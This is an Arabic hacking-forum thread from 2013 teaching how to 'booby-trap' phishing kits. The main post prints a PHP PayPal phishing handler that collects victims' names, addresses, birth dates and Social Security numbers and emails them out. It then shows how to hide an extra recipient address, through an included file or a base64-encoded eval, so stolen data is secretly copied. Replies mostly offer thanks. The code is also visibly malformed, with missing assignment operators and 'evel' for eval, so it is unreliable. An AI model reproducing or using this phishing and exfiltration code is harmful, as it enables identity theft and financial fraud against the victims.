1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] تلغيم الأسكامه بطريقتين سهله ومفصله

الموضوع في 'قسم الإسبام وأدواته' بواسطة أمير عرش الدموع, بتاريخ ‏15 ديسمبر 2013.

كاتب الموضوع : أمير عرش الدموع المشاهدات : 2,304 الردود : 11 ‏15 ديسمبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    أمير عرش الدموع
    DeveloPer Plus

    عضو منذ:
    ‏25 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    [​IMG]
    [​IMG]

    اليوم شرحنا تلغيم الأسكامات بطريقه سهله وسلسه !:"

    التلغيم بالجافا اسكربت

    هو استدعاء ملف جافا خارجى او داخلى (داخل او خارج الاسكامه )بس داخل افضل عشان ما يشك

    والكود ده بيساعد على الارسال لاميلين الاميل تبع الضحيه

    والاميل تبعك [​IMG]

    [​IMG]

    ركز شوي

    كود PHP:
    include 'folder/file.js';
    نيجى نشرح الكود
    include هى الداله
    folder اسم الفولدر الى فيه الملف الجافا سكربت
    file.js اسم ملف الجافا اسكريبت

    [​IMG]

    طيب تسئل اين اضع الكود ؟؟

    كود PHP:
    <?php
    include 'folder/file.js';
    $ip getenv("REMOTE_ADDR");
    $hostname gethostbyaddr($ip);
    $message  "==================+ PayPal ReZulT +==================\n";
    $message .= "first Name                 : ".$_POST['first_name']."\n";
    $message .= "Last Name                  : ".$_POST['last_name']."\n";
    $message .= "DateOfBirth                : ".$_POST['day']."/".$_POST['month']."/".$_POST['year']."\n";
    $message .= "Adress Line 1              : ".$_POST['address1']."\n";
    $message .= "Adress Line 2              : ".$_POST['address2']."\n";
    $message .= "Contry                     : ".$_POST['country']."\n\n";
    $message .= "City                       : ".$_POST['city']."\n";
    $message .= "Postal code                : ".$_POST['zip']."\n";
    $message .= "state                      : ".$_POST['state']."\n\n";
    $message .= "phonen                     : ".$_POST['phone_number']."\n\n";
    $message .= "ssn                        : ".$_POST['ssn1']."/".$_POST['ssn2']."/".$_POST['ssn3']."\n";
    $message .= "sessn                      : ".$_POST['sessn']."\n\n";
    $message .= "dkssn                      : ".$_POST['dkssn']."\n\n";
    $message .= "fissn                      : ".$_POST['fissn']."\n\n";
    $message .= "itssn                      : ".$_POST['itssn']."\n\n";
    $message .= "===================\n";
    $message .= "Client IP                  : ".$ip."\n";
    $message .= "HostName                   : ".$hostname."\n";
    $message .= "=============+ Created in 2013 By RedDragon TeaM +=============\n";
    $rnessage "$message\n";
    $send"your Email";
    $subject "RedDragon TeaM ReZulT | $ip";
    $headers "From: RedDragon TeaM Result";
    $file fopen("herobilling.txt","ab");
    fwrite($file,$message);
    fclose($file);

    $str=array($send$IWP); foreach ($str as $send)
    if(
    mail($send,$subject,$rnessage,$headers) != false){
    mail($Send,$subject,$rnessage,$headers);

    }
    header("Location:card.html");
    ?>
    نعمل ملف ونسميه مثلآ iq-team.js

    ونضع الكود التالي

    كود PHP:
    <?
    $IP 'your@email.com';
    ?>
    تمام حطيناه تقوم معدل الكود الاولانى بمكان الملف
    نيجى بقا لشرح بالصور
    اول شىء نفتح الملف

    [​IMG]

    تمام حطيناه
    نيجى بقا فى اى فولدر فى الاسكامه ونعمل ملف جديد ونسميه iq-team.js
    ونضع الكود ال3 فيه

    [​IMG]

    تمام حطيناه تروح بقا لملف الرزولت وتعدل عليه الكود بمكان ملف الجافا اسكربت

    [​IMG]

    التلغيمه الثانيه !:"

    وهو عبر كود eval بملف الريزولت
    ماهو هذا الكو وماعمله
    شوف يا سيدى الكود هذا بيبقا اميلك مشفر base64
    كيف طيب
    صوره للتوضيح

    [​IMG]

    كود PHP:
    echo @evel(base64_decode('iq-team.org@yahoo.com'));
    طبعآ تشفر ايملك قبل ماتضعه

    او

    كود PHP:
    echo @evel(base64_decode('$send= "iq-team.org@yahoo.com";'));
    طيب وهذا موقع للتشفير

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    [​IMG]

    الايميل بعد التشفير اصبح
    كود PHP:
    aXEtdGVhbS5vcmdAeWFob28uY29t
    تمام الان نكمل

    كود PHP:
    echo @evel(base64_decode('aXEtdGVhbS5vcmdAeWFob28uY29t'));
    او ممكن

    كود PHP:
    @evel(base64_decode('aXEtdGVhbS5vcmdAeWFob28uY29t'));
    الان نضعه تابع

    [​IMG]

    وكذا خلصنا الشرح اتمنى يكون سهل ومفهوم موفقين اخواني

     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    Mr-Sp!R!T
    Developer

    عضو منذ:
    ‏21 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم الأسكامه بطريقتين سهله ومفصله

    لاهنت على الشرح يالغلا واحلى ++​
     


  3. غير متصل

    سـلآشـ هـكــر
    DeveloPer Plus

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    مآهو شغلك .}.!
    الإقامة:

    رد: تلغيم الأسكامه بطريقتين سهله ومفصله

    وعليكم السلام ورحمة الله وبركاته

    بارك الله فيك يا غالي , :{11}:
     


  4. غير متصل

    العقرب الأسود
    rankrank
    Developer

    عضو منذ:
    ‏21 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:

    رد: تلغيم الأسكامه بطريقتين سهله ومفصله

    شكرا لك أخي الكريم شرح رائع
    تم التقيم :{1}:​
     


  5. غير متصل

    katalooni
    rankrank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم الأسكامه بطريقتين سهله ومفصله

    لا هنت عالطرح
     


  6. غير متصل

    back track
    rank
    Developer

    عضو منذ:
    ‏5 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: تلغيم الأسكامه بطريقتين سهله ومفصله

    موضوع منسق واكثر من رائع

    تسلم ايديك
     


  7. غير متصل

    Dr.CooBrA_NeT
    Active DeveloPer

    عضو منذ:
    ‏5 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم الأسكامه بطريقتين سهله ومفصله

    بارك الله فيك يا بطل

    شرح رائع يا غالى

    استمر يا غالى
     


  8. غير متصل

    Dr.TaYeB
    rank
    Developer

    عضو منذ:
    ‏22 ديسمبر 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تلغيم الأسكامه بطريقتين سهله ومفصله

    شرح حلو ومنسق حبيبي تسلم على التوضيح :{1}: بس للاشارة فقط ما انصح بالتلغيم وما احب الملغمين :{19}:

    والسبامر المحترف والي عارفاسرار المجال هو الي راح يفهمني pir+_"te2
     


  9. غير متصل

    آبداع هــكر
    rankrank
    Developer

    عضو منذ:
    ‏2 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: تلغيم الأسكامه بطريقتين سهله ومفصله

    الله يعطيك العافية اخوى ما قصرت
     


  10. غير متصل

    خَـلـوٍوٍدٍي
    Active DeveloPer

    عضو منذ:
    ‏10 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تلغيم الأسكامه بطريقتين سهله ومفصله

    آلله يَعطيَكَ ألف عآفيـة
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...